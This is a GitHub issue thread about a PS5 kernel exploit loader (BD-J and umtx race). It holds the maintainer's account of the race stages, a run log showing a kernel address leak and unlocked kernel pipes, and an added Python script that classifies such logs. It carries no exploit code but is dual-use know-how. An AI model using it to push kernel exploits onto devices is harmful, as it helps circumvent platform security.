hammer-83 / ps5-jar-loader

Remote JAR Loader for PS5, using BD-J vulnerability

umtx bug spams infinitely and doesn't work on any fw #2

Closed zecoxao closed 1 month ago

zecoxao commented 1 month ago

I see an infinite spam of threads on 7.61 and nothing happens, help!

hammer-83 commented 1 month ago

So, a couple of things:

  1. It sometimes takes 1000s of iterations before stage1 gets the shm overlap.
  2. Afterwards, it may or may not be able to get kernel memory.
  3. If it does not, it repeats the process from the start.
  4. If it does, it will do some reads from memory, print the address of kernel thread and crash.

For this reason, I suggest:

hammer-83 commented 1 month ago

For reference, this is a partial output I get after the race is triggered:

[INFO] [JarLoader] [main] Number of successful destructions: 2
...
[INFO] [JarLoader] [main] Spraying and praying
...
[INFO] [JarLoader] [main] Checking for shared memory object corruption
[INFO] [JarLoader] [main] Original descriptor of primary shared memory object: 41
[INFO] [JarLoader] [main] Lookup descriptor of primary shared memory object: 41
[INFO] [JarLoader] [main] Size of primary shared memory object: 0x2b000
[INFO] [JarLoader] [main] Calculated descriptor #43
[INFO] [JarLoader] [main] Got mismatch of descriptors!
[INFO] [JarLoader] [main] Checking succeeded, winner descriptor of shared memory object: 43
[INFO] [JarLoader] [main] Closing descriptor #42 of reclaim shared memory object #0
[INFO] [JarLoader] [main] Truncating shared memory object with descriptor #43
...
[INFO] [JarLoader] Got memory corruption after 223 iterations
[INFO] [JarLoader] Doing post-exploitation
[INFO] [Thread-135] [destroyer#0] Finishing loop
[INFO] [Thread-136] [destroyer#1] Finishing loop
[INFO] [Thread-137] [lookup] Finishing loop
...
[INFO] [JarLoader] Mapping memory of shared memory object with lookup descriptor #41
[INFO] [JarLoader] Mapped address of potential kernel stack: 0x21478c000. Size: 0x4000
[INFO] [JarLoader] Protecting mapped memory of potential kernel stack
[INFO] [JarLoader] Starting reclaim threads
[INFO] [JarLoader] Reclaim threads started
[INFO] [JarLoader] Checking if reclaimed memory belongs to controlled thread
[INFO] [JarLoader] Found marker pattern in kernel stack at 0x6bc
[INFO] [JarLoader] Classifying leaked kernel addresses
[INFO] [JarLoader] Determined reclaim job index: 2
[INFO] [JarLoader] Found reclaim thread 'reclaim#2' using 1 attempts
[INFO] [JarLoader] Found potential kernel thread address: 0xffffa2c373114ce0
[INFO] [JarLoader] [main] Resetting ready flag
[INFO] [JarLoader] Joining reclaim threads
[INFO] [Thread-141] [reclaim#3] Not target thread
...
[INFO] [Thread-140] [reclaim#2] I am lucky
...
[INFO] [Thread-140] [reclaim#2] Reading from read pipe #29
[INFO] [JarLoader] [main] Attempting to unlock pipe for kernel primitives
[INFO] [JarLoader] Writing to write pipe #30
[INFO] [JarLoader] Writing to write pipe #30 finished with result 4096
[INFO] [JarLoader] [main] Pipe for kernel primitives unlocked
[INFO] [JarLoader] [main] Waiting for command processor to start up
[INFO] [Thread-140] [reclaim#2] Reading from read pipe #29 finished with result 4096
[INFO] [Thread-140] [reclaim#2] Starting command processor loop
[INFO] [JarLoader] [main] Done waiting for command processor to start up
[INFO] [JarLoader] Leaked kernel thread name: reclaim#2
[INFO] [JarLoader] Kernel thread address is correct
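To make the four stages above easy to spot in a long log, here is a small log classifier. It is an added example for this thread, not code from ps5-jar-loader; it only matches the `[JarLoader]` message texts quoted in this issue, and the sample log embedded in it is constructed from fragments of that quoted output. It reports the furthest stage a run reached, the iteration count at which the overlap happened, the leaked thread address, and whether the loader went back to spraying after an overlap (step 3 in the list).

```python
"""Classify how far a ps5-jar-loader run got from its log output.

Added example for this issue thread; not part of the project's code.
Only the message texts quoted in the thread are matched.
"""
import re

# Constructed sample, built from fragments of the output quoted in this thread.
SAMPLE_LOG = """\
[INFO] [JarLoader] [main] Spraying and praying
[INFO] [JarLoader] [main] Checking for shared memory object corruption
[INFO] [JarLoader] [main] Got mismatch of descriptors!
[INFO] [JarLoader] Got memory corruption after 223 iterations
[INFO] [JarLoader] Doing post-exploitation
[INFO] [JarLoader] Found potential kernel thread address: 0xffffa2c373114ce0
[INFO] [JarLoader] Leaked kernel thread name: reclaim#2
[INFO] [JarLoader] Kernel thread address is correct
"""

# Log markers for the stages hammer-83 lists, in order of progress.
STAGES = [
    ("spraying", re.compile(r"Spraying and praying")),
    ("shm_overlap", re.compile(r"Got memory corruption after (\d+) iterations")),
    ("kernel_thread_found",
     re.compile(r"Found potential kernel thread address: (0x[0-9a-fA-F]+)")),
    ("kernel_access_confirmed", re.compile(r"Kernel thread address is correct")),
]
STAGE_INDEX = {name: i for i, (name, _) in enumerate(STAGES)}


def classify_run(log_text):
    """Summarise a run: furthest stage reached, iteration count, leaked address,
    and whether the loader went back to spraying after an overlap (step 3)."""
    summary = {"stage": "not_started", "iterations": None,
               "kthread": None, "restarted_after_overlap": False}
    furthest = -1
    for line in log_text.splitlines():
        for name, pattern in STAGES:
            m = pattern.search(line)
            if not m:
                continue
            idx = STAGE_INDEX[name]
            # A spray line after an overlap means the run started over.
            if name == "spraying" and furthest >= STAGE_INDEX["shm_overlap"]:
                summary["restarted_after_overlap"] = True
            if idx > furthest:
                furthest = idx
                summary["stage"] = name
            if name == "shm_overlap":
                summary["iterations"] = int(m.group(1))
            elif name == "kernel_thread_found":
                summary["kthread"] = m.group(1)
    return summary


if __name__ == "__main__":
    print(classify_run(SAMPLE_LOG))
```

Feed it the full console output of a run (for example via `classify_run(open("run.log").read())`); a result stuck at `spraying` with no `iterations` is the "infinite spam" case from the opening comment, while `restarted_after_overlap` set to true is the step-3 case where the overlap happened but kernel memory was not obtained.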

zecoxao commented 1 month ago

thanks for the output. closing...